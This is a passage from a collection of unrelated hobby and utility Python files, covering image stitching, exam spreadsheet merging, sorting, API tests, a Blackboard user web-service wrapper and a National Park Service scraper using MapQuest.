lambda f: int(f.split('/')[-1].split('_')[1])\n        #self.flist.sort(key=get_index)\n        self.flist.sort()\n        #pprint(self.flist)\n        \n        #matches = [re.match(r\"^(?P[a-zA-Z]+)(?P[0-9]+)($|[a-zA-Z_]+(?P[0-9]+))\", c).groupdict() for c in comments]\n        # Step 1: Prepare stitch macro, fix large image\n        self.convert_to_8bit()\n        self.prepare_macro()\n        \n        # Step 2: Run stitch\n        self.run_fiji()\n        \n\n\n\ndef main():\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--input')\n    parser.add_argument('--output')\n    parser.add_argument('--cmin', type=float)\n    parser.add_argument('--cmax', type=float)\n    parser.add_argument('--overlap', type=int)\n    #parser.add_argument('--stitch', default=False, type=bool)\n    args = parser.parse_args()\n    #rootDir = os.getcwd()\n    fs = Fiji_Stitcher(args.input, args.output, args.cmin, args.cmax, args.overlap)\n    fs.run()\nif __name__ == '__main__':\n    main()\n    ","sub_path":"KLab_Utils/fiji_stitch.py","file_name":"fiji_stitch.py","file_ext":"py","file_size_in_byte":7976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"520052804","text":"from merge_exam_info.lib.func import get_filenames, get_students_exam_info_data, \\\r\n    from_computer_course_info_get_students_data\r\nfrom openpyxl import load_workbook\r\n\r\npath = '计算机应用基础模板-.xlsx'\r\nsheet_name = '计算机应用基础模板'\r\n\r\njsj_datas = from_computer_course_info_get_students_data(path=path)\r\n\r\n# Central Open University student exam data\r\n# path = '签到表/中央开网考/data/'\r\npath = 'xml/'\r\n# Get the list of all xml filenames in the given folder\r\nfilenames = get_filenames(path)[1:]\r\nzyk_datas = get_students_exam_info_data(filenames, path)\r\n\r\nprint(f'Computer Application Basics count: {len(jsj_datas)}')\r\nprint(f'Online exam count: {len(zyk_datas)}')\r\n\r\n# Merge the data\r\nfor data in jsj_datas:\r\n    zyk_datas.append(data)\r\n\r\nprint(f'Total after merge: {len(zyk_datas)}')\r\n\r\nwb = load_workbook('tzd.xlsx')\r\n\r\n# Get the number of rows\r\nrows = wb['sheet1'].max_row\r\nfor a_i in range(1, rows + 1):\r\n    
print(f'------- Processing row {a_i} -------')\r\n    a_val = wb['sheet1'][f'A{a_i}'].value\r\n    try:\r\n        stu_id = a_val[24:37]  # student ID\r\n        # If the student ID exists, scan the data for this student's info\r\n        for i in range(len(zyk_datas) - 1, -1, -1):  # iterate in reverse so matched items can be removed, shortening later searches\r\n            stu_info = zyk_datas[i]\r\n            # If the student ID is found in the info table\r\n            if stu_id == stu_info[0]:\r\n                # Walk through all of this student's exam subjects (never more than 30)\r\n                for j in range(2, 30):\r\n                    # Get the paper number from the notification sheet\r\n                    sjh = wb['sheet1'][f'A{a_i + j}'].value\r\n                    # First check whether sjh is the exam-site header row '考点名称:秦皇岛电大'\r\n                    if sjh == '考点名称:秦皇岛电大':\r\n                        # print(sjh)\r\n                        break\r\n                    # If the paper number is in the list\r\n                    elif str(sjh) in stu_info:\r\n                        # Write the exam-room number\r\n                        wb['sheet1'][f'D{a_i + j}'].value = stu_info[1]\r\n                        # Write the seat number\r\n                        wb['sheet1'][f'E{a_i + j}'].value = stu_info[2]\r\n                        # Write the exam date\r\n                        wb['sheet1'][f'F{a_i + j}'].value = stu_info[4]\r\n                        # Write the exam time\r\n                        wb['sheet1'][f'G{a_i + j}'].value = stu_info[5]\r\n                        # print(stu_id)\r\n                        print(f'{stu_id}: paper number {sjh} written!')\r\n                        # Remove the matched element to narrow later searches\r\n                        zyk_datas.pop(i)\r\n                        # print(len(zyk_datas))\r\n    except Exception as e:\r\n        print(e)\r\n        continue\r\nwb.save('tzd.xlsx')\r\nwb.close()\r\n","sub_path":"merge_exam_info/merge_exam_info_by_openpyxl.py","file_name":"merge_exam_info_by_openpyxl.py","file_ext":"py","file_size_in_byte":2740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"515423317","text":"#!/usr/bin/env python3\n# coding=utf-8\n\nclass FloatRange(object):\n    def __init__(self, start, end, step=0.1):\n        self.start = start\n        self.end = end\n        self.step = step\n# Forward iteration\n    def __iter__(self):\n        t = self.start\n        while t <= self.end:\n            yield t\n            t += self.step\n# Reverse-iteration interface\n    def __reversed__(self):\n        t = self.end\n        while t >= self.start:\n            yield t\n            t -= self.step\n\n# test\nif __name__ == '__main__':\n    for x in FloatRange(1.0, 4.0, 0.5):\n        print(x)\n    print('Reverse iteration:')\n    for x in reversed(FloatRange(1.0, 4.0, 0.5)):\n        print(x)\n\n\n\n\n","sub_path":"01_Python_Basics/36-reversed-iterator.py","file_name":"36-reversed-iterator.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"549649110","text":"import argparse\nparser = argparse.ArgumentParser(description='select an integer, starting from 1')\nparser.add_argument(\"ID\", help=\"Select file to process according to SGE_TASK_ID integer\",\n                    type=int)\nargs = parser.parse_args()\nprint(args.ID)\nimport os\nimport loompy\n\n#path=\"/home/yah2014/Dropbox/Public/Olivier/Projects/scRNAseq-Lymphoma/data\"\npath=\"/Users/yah2014/Dropbox/Public/Olivier/Projects/scRNAseq-Lymphoma/data\"\nos.chdir(path) # change current path\nprint(os.getcwd())\n# List all file folders' names.\nfile_folders=os.listdir(os.getcwd()) # list files\nfile=file_folders[args.ID-1]\nprint(file)\n\n# Select the file according to SGE_TASK_ID\nfile_path=os.path.join(path, file, \"velocyto\",file+'.loom')\nprint(\"file_path= \"+file_path)\n\n\n","sub_path":"bash/velocyto_single.py","file_name":"velocyto_single.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"472978610","text":"A = [99,55,4,66,28,31,36,52,38,72]\n\ndef insertionSort(A):\n    for i in range(1, len(A)):\n        x = A[i]\n        j = i -1 \n        while j >= 0 and x < A[j]:\n            A[j+1] = A[j]\n            j -= 1\n        A[j+1] = x\n    \ninsertionSort(A)\nprint(A)","sub_path":"insertionSort.py","file_name":"insertionSort.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"639484384","text":"import pytest\nimport 
requests\nimport re\n\n\ndef test_random_image():\n r = requests.get('https://dog.ceo/api/breeds/image/random').json()\n assert re.search(r'.jpg', r['message']), 'no JPG'\n assert r['status'] == 'success', 'fail'\n\n\ndef test_list():\n r = requests.get('https://dog.ceo/api/breed/hound/images').json()\n assert r['message'] != [], 'empty message'\n assert r['status'] == 'success', 'fail'\n\n\ndef test_breed_list():\n r = requests.get('https://dog.ceo/api/breeds/list/all').json()\n assert r['message'] != [], 'empty message'\n assert r['status'] == 'success', 'fail'\n\n\n@pytest.mark.parametrize('breeds', ['akita', 'beagle', 'brabancon', 'malamute', 'husky'])\ndef test_breed(breeds):\n r = requests.get(f'https://dog.ceo/api/breed/{breeds}/images/random').json()\n assert f'{breeds}' in r['message'], 'the breed does not match'\n assert r['status'] == 'success', 'fail'\n\n\n@pytest.mark.parametrize('quantity', range(1, 51))\ndef test_sub_breed(quantity):\n r = requests.get(f'https://dog.ceo/api/breed/hound/afghan/images/random/{quantity}').json()\n assert len(r['message']) == int(f'{quantity}'), 'number of pictures matches'\n assert r['status'] == 'success', 'fail'\n","sub_path":"test_dog-api.py","file_name":"test_dog-api.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"540100221","text":"#!/usr/bin/env python\n#\n# Project: Video Streaming with Flask\n# Author: Log0 \n# Date: 2014/12/21\n# Website: http://www.chioka.in/\n# Description:\n# Modified to support streaming out with webcams, and not just raw JPEGs.\n# Most of the code credits to Miguel Grinberg, except that I made a small tweak. Thanks!\n# Credits: http://blog.miguelgrinberg.com/post/video-streaming-with-flask\n#\n# Usage:\n# 1. Install Python dependencies: cv2, flask. (wish that pip install works like a charm)\n# 2. Run \"python main.py\".\n# 3. 
Navigate the browser to the local webpage.\n\nfrom flask import Flask, render_template, Response\nimport rest\nimport json\nimport os\n\nif __name__ == '__main__':\n\n server_url = 'http://127.0.0.1:8081'\n kod = 'aaaa'\n\n stream_url = server_url+'/get_ip'\n podaci = {\"kod\":kod}\n p = json.dumps(podaci)\n provera = rest.send('POST', stream_url, p, {'Content-Type': 'application/json'})\n print(provera)\n if 'status' in provera and provera['status'] == 'ok':\n ip = provera['ip']\n print(ip)\n os.system(r'\"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\" %s' % ip)\n else:\n print('neuspesno')\n\n #app.run(host='0.0.0.0', debug=True)","sub_path":"racunar.py","file_name":"racunar.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"519080078","text":"#!/usr/bin/python\n\n'''\nProblem 5:\n2520 is the smallest number that can be divided by each of the numbers from 1 to 10 without any remainder.\n\nWhat is the smallest positive number that is evenly divisible by all of the numbers from 1 to 20?\n'''\n\ndef multipleOfAll20(i):\n for j in range(1,21):\n if i % j != 0:\n print(\"Not multiple of %s\" % j)\n return False\n return True\n\ndef primeFactors(i):\n factors = []\n j = 2\n while j <= i:\n while i % j == 0:\n i = i / j\n factors.append(j)\n j = j + 1\n return factors\n\ndef factorCount(factors):\n factorDict = {}\n for factor in factors:\n if not(factorDict.has_key(factor)):\n factorDict[factor] = 1\n else:\n factorDict[factor] = factorDict[factor] + 1\n return factorDict\n\ndef getMaxFactorsForEach(i):\n maxFactors = {}\n for i in range(1,i+1):\n currentCount = factorCount(primeFactors(i))\n for factor in currentCount:\n if not(maxFactors.has_key(factor)):\n maxFactors[factor] = currentCount[factor]\n elif maxFactors[factor] < currentCount[factor]:\n maxFactors[factor] = currentCount[factor]\n return maxFactors\n\nfactorDict = getMaxFactorsForEach(20)\n\nproduct = 1\nfor factor in factorDict:\n for i in range(factorDict[factor]):\n product = product * factor\n\nprint(product)\n\n# This was for sanity-checking that the algorithm worked\n# print multipleOfAll20(product)\n\n'''\nAnswer: 232792560\n'''\n","sub_path":"python/problem5.py","file_name":"problem5.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"75020534","text":"import unittest\nfrom insights.parsers.uname import Uname\nfrom insights.parsers.redhat_release import RedhatRelease\nfrom insights.combiners.redhat_release import redhat_release\nfrom insights.tests import context_wrap\n\nUNAME = \"Linux localhost.localdomain 3.10.0-327.rt56.204.el7.x86_64 #1 SMP PREEMPT RT Thu Oct 29 21:54:23 EDT 2015 x86_64 x86_64 x86_64 GNU/Linux\"\nBAD_UNAME = \"Linux localhost.localdomain 2.6.24.7-101.el5rt.x86_64 #1 SMP PREEMPT RT Thu Oct 29 21:54:23 EDT 2015 x86_64 x86_64 x86_64 GNU/Linux\"\n\nREDHAT_RELEASE = \"\"\"\nRed Hat Enterprise Linux Server release 7.2 (Maipo)\n\"\"\".strip()\n\nFEDORA = \"\"\"\nFedora release 23 (Twenty Three)\n\"\"\".strip()\n\n\nclass TestRedhatRelease(unittest.TestCase):\n def test_uname(self):\n un = Uname(context_wrap(UNAME))\n shared = {Uname: un}\n expected = (7, 2)\n result = redhat_release(None, shared)\n self.assertEqual(result.major, expected[0])\n self.assertEqual(result.minor, expected[1])\n\n def test_redhat_release(self):\n rel = RedhatRelease(context_wrap(REDHAT_RELEASE))\n shared = 
{RedhatRelease: rel}\n expected = (7, 2)\n result = redhat_release(None, shared)\n self.assertEqual(result.major, expected[0])\n self.assertEqual(result.minor, expected[1])\n\n def test_both(self):\n un = Uname(context_wrap(UNAME))\n rel = RedhatRelease(context_wrap(REDHAT_RELEASE))\n shared = {Uname: un, RedhatRelease: rel}\n expected = (7, 2)\n result = redhat_release(None, shared)\n self.assertEqual(result.major, expected[0])\n self.assertEqual(result.minor, expected[1])\n\n def test_raise(self):\n un = Uname(context_wrap(BAD_UNAME))\n shared = {Uname: un}\n with self.assertRaises(Exception):\n redhat_release(None, shared)\n","sub_path":"insights/combiners/tests/test_redhat_release.py","file_name":"test_redhat_release.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"508695363","text":"\"\"\"\ncomentário...\nfiz um pip install simplekml e no pypi pra fazer rodar o import\n\"\"\"\nimport simplekml\nlongitude=input(\"Enter longitude: \")\nlatitude=input(\"Enter longitude: \")\nkml=simplekml.Kml()\nkml.newpoint(name=\"Sample\",coords=[(longitude,latitude)])\nkml.save(\"C:\\\\Cursos\\\\Python\\\\Python_udemy\\\\Python_for_begginers\\\\Points.kml\")","sub_path":"Python_udemy/Python_for_begginers/google_earth.py","file_name":"google_earth.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"106021545","text":"'''\r\nCreated on Oct 27, 2010\r\n\r\n@author: Chris Greenough - Chris.Greenough@nau.edu\r\n'''\r\n##from bbwsdl.User_WS_services import *\r\n##from bbwsdl.User_WS_services_types import *\r\nfrom bbwsdl import User_WS_services\r\nimport logging\r\nfrom BbPy.VO.UserWS import *\r\nclass UserWS(object):\r\n log=logging.getLogger(\"UserWS\")\r\n port=None\r\n sigHandler=None\r\n def __init__(self,sigHandler, baseUrl=None):\r\n self.sigHandler=sigHandler\r\n \r\n locator = User_WSLocator()\r\n self.port=locator.getUser_WSPortType(baseUrl)\r\n self.port.binding.sig_handler=self.sigHandler\r\n \r\n request = User_WS_services.getServerVersionRequest()\r\n response = self.port.getServerVersion(request)\r\n \r\n ret = response._return\r\n self.log.info(\"Connecting to UserWS version: %s\" % ret._version)\r\n \r\n def getUser(self,userFilterVO):\r\n request = getUserRequest()\r\n request._filter=userFilterVO.getUserFilter_Def()\r\n response = self.port.getUser(request)\r\n return map(UserVO,response._return)\r\n \r\n def getUserByBatchId(self,batchId):\r\n filter = UserFilterVO()\r\n filter.batchId=(batchId,)\r\n filter.filterType=UserFilterVO.GET_USER_BY_BATCH_ID_WITH_AVAILABILITY\r\n filter.available=True\r\n users = self.getUser(filter)\r\n if len(users) == 1: return users[0] \r\n else: return None\r\n \r\n def getUserByUserId(self,userId):\r\n filter = UserFilterVO()\r\n filter.name=(userId,)\r\n filter.filterType=UserFilterVO.GET_USER_BY_NAME_WITH_AVAILABILITY\r\n filter.available=True\r\n users = self.getUser(filter)\r\n if len(users) == 1: return users[0] \r\n else: return None\r\n \r\n def getUserById(self,id):\r\n filter = UserFilterVO()\r\n filter.id=(id,)\r\n filter.filterType=UserFilterVO.GET_USER_BY_ID_WITH_AVAILABILITY\r\n filter.available=True\r\n users = self.getUser(filter)\r\n if len(users) == 1: return users[0] \r\n else: return None\r\n \r\n def createSimpleUser(self, isAvailable, userName, studentId, email, firstName, lastName, *insRoles):\r\n \"\"\"\r\n @param isAvailable: boolean - 
Sets active\r\n        @param userName: string - Sets userID\r\n        @param studentId: string - Sets Student ID and batchUid\r\n        @param email: string - Sets email\r\n        @param firstName: string - Sets First Name\r\n        @param lastName: string - Sets Last Name\r\n        @param *insRoles: all the rest of the params will turn into institutional roles. First one being primary.\r\n        \"\"\"\r\n        user = UserVO()\r\n        user.userBatchUid=studentId\r\n        user.isAvailable=isAvailable\r\n        user.name=userName\r\n        user.studentId=studentId\r\n        extendedInfo = ExtendedInfoVO()\r\n        extendedInfo.emailAddress = email\r\n        # familyName is the surname and givenName the first name.\r\n        extendedInfo.familyName = lastName\r\n        extendedInfo.givenName = firstName\r\n        user.extendedInfo = extendedInfo\r\n        user.insRoles = insRoles\r\n        return self.saveUser(user)\r\n    \r\n    def updateSimpleUser(self,isAvailable, userName, studentId, email, firstName, lastName, *insRoles):\r\n        \"\"\"\r\n        @param isAvailable: boolean - Sets active\r\n        @param userName: string - Sets userID\r\n        @param studentId: string - Sets Student ID and batchUid\r\n        @param email: string - Sets email\r\n        @param firstName: string - Sets First Name\r\n        @param lastName: string - Sets Last Name\r\n        @param *insRoles: all the rest of the params will turn into institutional roles. First one being primary.\r\n        \"\"\"\r\n        user = self.getUserByBatchId(studentId)\r\n        if user is None:\r\n            user = UserVO()\r\n            user.userBatchUid=studentId\r\n        user.isAvailable=isAvailable\r\n        user.name=userName\r\n        user.studentId=studentId\r\n        extendedInfo = ExtendedInfoVO()\r\n        extendedInfo.emailAddress = email\r\n        extendedInfo.familyName = lastName\r\n        extendedInfo.givenName = firstName\r\n        user.extendedInfo = extendedInfo\r\n        user.insRoles = insRoles\r\n        return self.saveUser(user)\r\n    \r\n    def saveUser(self,userVO):\r\n        request = saveUserRequest()\r\n        request._user=[userVO.getUser_Def()]\r\n        response = self.port.saveUser(request)\r\n        return response._return\r\n    \r\n    def saveUsers(self,userVOs):\r\n        request = saveUserRequest()\r\n        ret = []\r\n        for userVo in userVOs:\r\n            ret.append(userVo.getUser_Def())\r\n        request._user=ret\r\n        response = self.port.saveUser(request)\r\n        return response._return\r\n    \r\n    def deleteUser(self,userId):\r\n        request = deleteUserRequest()\r\n        request._userId=[userId]\r\n        response = self.port.deleteUser(request)\r\n        return response._return\r\n    \r\n    def deleteUsers(self,userIds):\r\n        request = deleteUserRequest()\r\n        request._userId=userIds\r\n        response = self.port.deleteUser(request)\r\n        return response._return\r\n    \r\n    def changeUserBatchUid(self,originalBatchUid,newBatchUid):\r\n        request = changeUserBatchUidRequest()\r\n        request._originalBatchUid=originalBatchUid\r\n        request._batchUid=newBatchUid\r\n        response = self.port.changeUserBatchUid(request)\r\n        return response._return\r\n    \r\n    \r\n    \r\n    \r\n    \r\n    ","sub_path":"src/BbPy/UserWS.py","file_name":"UserWS.py","file_ext":"py","file_size_in_byte":5388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"34704967","text":"import json\r\nimport random\r\nimport sys\r\nfrom learner import MyLearner, setupLearner\r\nimport examples\r\nimport time\r\n\r\nstart_time = time.time()\r\n\r\nwith open('params.json', 'r') as f:\r\n    cfg = json.load(f)\r\n\r\nrandom.seed(cfg['random_seed'])\r\n\r\n# Load data\r\north = examples.load('data/3k/orth.csv', simplify=True)\r\nphon = examples.load('data/3k/phon.csv', simplify=True)\r\nwords = [x.strip() for x in open('data/3k/words.csv','r').readlines()]\r\n\r\nT = []\r\nwith 
open(\"brute-force_performance_{seed:d}.csv\".format(seed=cfg['random_seed']), 'w') as f:\r\n for k in range(cfg['samples_to_search']):\r\n training_set = random.sample(range(len(orth)), cfg['training_size'])\r\n T.append(training_set)\r\n for j in range(cfg['attempts_per_sample']):\r\n learner = setupLearner(\r\n hidden_layer_sizes=cfg['hidden_size'],\r\n max_iter=cfg['max_iter'],\r\n input_patterns=orth,\r\n target_patterns=phon)\r\n learner.fit(training_set)\r\n f.write(\"{sample:d},{attempt:d},{loss_train:.8f},{loss_test:.8f},{acc_train:.8f},{acc_test:.8f}\\n\".format(\r\n sample = k,\r\n attempt = j,\r\n loss_train = learner.loss_training(),\r\n loss_test = learner.loss(),\r\n acc_train = learner.acc_training(),\r\n acc_test = learner.acc()\r\n ))\r\n\r\n\r\nwith open(\"brute-force_test-sets_{seed:d}.csv\".format(seed=cfg['random_seed']), 'w') as f:\r\n for i,w in enumerate(words):\r\n f.write(\"{word:s},\".format(word=w))\r\n isTrainingItem = [i in T[j] for j in range(len(T))]\r\n f.write(\"{vec:s}\\n\".format(vec = ','.join([str(int(tf)) for tf in isTrainingItem])))\r\n\r\n\r\nprint(\"---- %s seconds -----\" % (time.time() - start_time))\r\n","sub_path":"results/FeedForward/Candide/Candide_unordered/brute-force/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"4994681","text":"#################################\n##### Name: Hang Song\n##### Uniqname: hangsong\n#################################\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport json\nimport secrets # file that contains your API key\n\nBASE_URL = \"https://www.nps.gov\"\nCACHE_FILENAME = \"national_parks_cache.json\"\nCACHE_DICT = {}\nMAP_URL = \"http://www.mapquestapi.com/search/v2/radius\"\n\nconsumer_key = secrets.CONSUMER_KEY\nconsumer_secret = secrets.CONSUMER_SECRET\n\n\nclass NationalSite:\n '''a national site\n\n Instance Attributes\n -------------------\n category: string\n the category of a national site (e.g. 'National Park', '')\n some sites have blank category.\n \n name: string\n the name of a national site (e.g. 'Isle Royale')\n\n address: string\n the city and state of a national site (e.g. 'Houghton, MI')\n\n zipcode: string\n the zip-code of a national site (e.g. '49931', '82190-0168')\n\n phone: string\n the phone of a national site (e.g. 
'(616) 319-7906', '307-344-7381')\n '''\n def __init__(self, category, name, address, zipcode, phone):\n self.category = category\n self.name = name\n self.address = address\n self.zipcode = zipcode\n self.phone = phone\n \n def info(self):\n return f\"{self.name} ({self.category}): {self.address} {self.zipcode}\"\n\n\ndef open_cache():\n ''' Opens the cache file if it exists and loads the JSON into\n the CACHE_DICT dictionary.\n if the cache file doesn't exist, creates a new cache dictionary\n\n Parameters\n ----------\n None\n\n Returns\n -------\n The opened cache: dict\n '''\n try:\n cache_file = open(CACHE_FILENAME, 'r')\n cache_contents = cache_file.read()\n cache_dict = json.loads(cache_contents)\n cache_file.close()\n except:\n cache_dict = {}\n return cache_dict\n\ndef save_cache(cache_dict):\n ''' Saves the current state of the cache to disk\n \n Parameters\n ----------\n cache_dict: dict\n The dictionary to save\n \n Returns\n -------\n None\n '''\n dumped_json_cache = json.dumps(cache_dict)\n fw = open(CACHE_FILENAME,\"w\")\n fw.write(dumped_json_cache)\n fw.close()\n\ndef make_request_with_cache(url):\n '''Check the cache for a saved result for this baseurl+params:values\n combo. If the result is found, return it. Otherwise send a new \n request, save it, then return it.\n\n Parameters\n ----------\n url: string\n\n Returns\n -------\n dict\n the results of the query as a dictionary loaded from cache\n JSON\n '''\n CACHE_DICT = open_cache()\n\n if (url in CACHE_DICT.keys()):\n print(\"Using Cache\")\n return CACHE_DICT[url]\n else:\n print(\"Fetching\")\n response = requests.get(url)\n CACHE_DICT[url] = response.text\n save_cache(CACHE_DICT)\n return CACHE_DICT[url]\n\ndef map_make_request_with_cache(url):\n CACHE_DICT = open_cache()\n\n if (url in CACHE_DICT.keys()):\n print(\"Using Cache\")\n return CACHE_DICT[url]\n else:\n print(\"Fetching\")\n response = requests.get(url)\n CACHE_DICT[url] = response.json()\n save_cache(CACHE_DICT)\n return CACHE_DICT[url]\n\n\ndef build_state_url_dict():\n ''' Make a dictionary that maps state name to state page url from \"https://www.nps.gov\"\n\n Parameters\n ----------\n None\n\n Returns\n -------\n dict\n key is a state name and value is the url\n e.g. 
{'michigan':'https://www.nps.gov/state/mi/index.htm', ...}\n '''\n main_url = \"https://www.nps.gov/index.htm\"\n url_text = make_request_with_cache(main_url)\n soup = BeautifulSoup(url_text, 'html.parser')\n \n state_list_parent = soup.find('div',class_ = 'SearchBar-keywordSearch input-group input-group-lg')\n state_list = state_list_parent.find_all('li')\n state_url_dict = {}\n\n for state_info in state_list:\n state_tag = state_info.find('a')\n state_detail_path = state_tag['href']\n state_detail_url = BASE_URL+state_detail_path\n state_url_dict[state_tag.string.lower()] = state_detail_url\n \n return state_url_dict\n \n\n\ndef get_site_instance(site_url):\n '''Make an instances from a national site URL.\n \n Parameters\n ----------\n site_url: string\n The URL for a national site page in nps.gov\n \n Returns\n -------\n instance\n a national site instance\n '''\n url_text = make_request_with_cache(site_url)\n soup = BeautifulSoup(url_text, 'html.parser')\n \n site_head_parent = soup.find('div',class_ = \"Hero-titleContainer clearfix\")\n site_name = site_head_parent.find('a').text\n site_category = site_head_parent.find('div',class_=\"Hero-designationContainer\").find('span',class_=\"Hero-designation\").text\n\n #check if address exists - Yosemite for example\n site_address_parent = soup.find('p',class_='adr')\n site_locality = None\n site_region = None\n site_zipcode = None\n site_address = None\n\n if site_address_parent is not None:\n site_locality = soup.find(\"span\",itemprop = \"addressLocality\").text\n site_region = soup.find(\"span\",itemprop = \"addressRegion\").text\n site_zipcode = soup.find(\"span\",itemprop = \"postalCode\").text.strip()\n site_address = site_locality + \", \" + site_region\n else:\n site_zipcode = 'No zipcode'\n site_address = 'No address'\n\n site_phone = soup.find(\"span\",itemprop =\"telephone\").text.strip()\n\n national_site = NationalSite(category = site_category, name = site_name, address = site_address, zipcode= site_zipcode, phone = site_phone)\n\n return national_site\n\n\ndef get_sites_for_state(state_url):\n '''Make a list of national site instances from a state URL.\n\n Parameters\n ----------\n state_url: string\n The URL for a state page in nps.gov\n\n Returns\n -------\n list\n a list of national site instances\n '''\n url_text = make_request_with_cache(state_url)\n soup = BeautifulSoup(url_text, 'html.parser')\n\n park_instance_list = []\n\n park_info_parent = soup.find(id=\"list_parks\")\n park_info = park_info_parent.find_all('h3')\n\n for park in park_info:\n park_ref = park.find('a')['href']\n park_url = BASE_URL+park_ref+'index.htm'\n parkinstance = get_site_instance(park_url)\n park_instance_list.append(parkinstance)\n\n return park_instance_list\n\ndef construct_unique_key(baseurl,params):\n '''construct api_key according to the input.\n Parameters\n ----------\n baseurl: string\n The URL for a state page in mapquest\n params: dictionary\n Contains the parameters associated with the API request \n\n Returns\n -------\n string\n a string constructed from the baseurl and params\n '''\n param_strings = []\n connector = '&'\n for k in params.keys():\n param_strings.append(f'{k}={params[k]}')\n param_strings.sort()\n unique_key = baseurl + '?' 
+ connector.join(param_strings)\n return unique_key\n\n\ndef get_nearby_places(site_object):\n '''Obtain API data from MapQuest API.\n\n Parameters\n ----------\n site_object: object\n an instance of a national site\n\n Returns\n -------\n dict\n a converted API return from MapQuest API\n '''\n origin = site_object.zipcode\n params = {'origin':origin,'radius':10,'maxMatches':10,'ambiguities':'ignore','outFormat':'json','key':consumer_key}\n map_api_key = construct_unique_key(MAP_URL,params)\n response_dict = map_make_request_with_cache(map_api_key)\n\n return response_dict\n\ndef print_nearby_places(map_api_dict):\n '''Print nearby places .\n\n Parameters\n ----------\n map_api_dict: dictionary\n a converted API dictionary related to the chosen site\n\n Returns\n -------\n None\n '''\n results_list = map_api_dict['searchResults']\n for result in results_list:\n place_name = result['name']\n place_category = result['fields']['group_sic_code_name']\n place_address = result['fields']['address']\n place_city = result['fields']['city']\n if len(place_category) == 0:\n place_category = 'no category'\n if len(place_address) == 0:\n place_address = 'no address'\n if len(place_city) == 0:\n place_city = 'no city'\n print(f\"- {place_name} ({place_category}): {place_address}, {place_city}\")\n\n\n\nif __name__ == \"__main__\":\n np_url_dict = build_state_url_dict()\n # print(np_url_dict)\n\n # np = get_site_instance(\"https://www.nps.gov/frst/index.htm\")\n\n \n while True:\n state = input(\"Enter a state name (e.g. Michigan, michigan) or 'exit': \")\n \n if state.lower() == \"exit\":\n exit()\n elif state.lower() not in np_url_dict:\n print('[Error] Enter a state name.\\n')\n continue\n else:\n print(\"-\"*40)\n print(f\"List of national sites in {state.title()}\")\n print(\"-\"*40)\n state_url = np_url_dict[state.lower()]\n state_nps_list = get_sites_for_state(state_url)\n num = 1\n for park in state_nps_list :\n print(f\"[{num}] {park.info()}\")\n num = num+1\n \n print('-'*40)\n while True:\n num = input(\"Choose the number for detail search or 'exit' or 'back': \")\n if num == 'exit':\n exit()\n elif num == 'back':\n break\n elif num.isnumeric() and int(num) >= 1 and int(num) <= len(state_nps_list):\n site_chose = state_nps_list[int(num)-1]\n site_api_dict = get_nearby_places(site_chose)\n print(\"-\"*40)\n print(f\"Show places that are near {site_chose.name}\")\n print(\"-\"*40)\n print_nearby_places(site_api_dict)\n else:\n print('[Error] Invalid Input')\n print('-'*40)\n continue\n\n\n","sub_path":"proj2_nps.py","file_name":"proj2_nps.py","file_ext":"py","file_size_in_byte":9978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"590194425","text":"import math\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ngeolift = np.loadtxt(\"geolift.txt\",dtype=np.float64) #将文件写入数组\nn0 = len(geolift)\n\n#Y1 = np.ones(n0) #存储投影后的网格点的y坐标\n#Z1 = np.ones(n0) #存储网格点的z坐标\n#存储表面力\ndFy0 = np.ones(n0) #存储网格点的x坐标\nprint(n0)\n\nfor i in range(0,n0):\n dFy0[i] = geolift[i][4]\n\n\ns = 0\nfor i in range(1,n0):\n s = s + dFy0[i]\n\nprint(2*s)\n","sub_path":".history/test_20210422214624.py","file_name":"test_20210422214624.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"556371451","text":"\"\"\"Calendar class\"\"\"\n\n\nfrom datetime import datetime\nfrom calendar import Calendar\nfrom match import Match\nfrom team import Team\n\nclass Handler:\n 
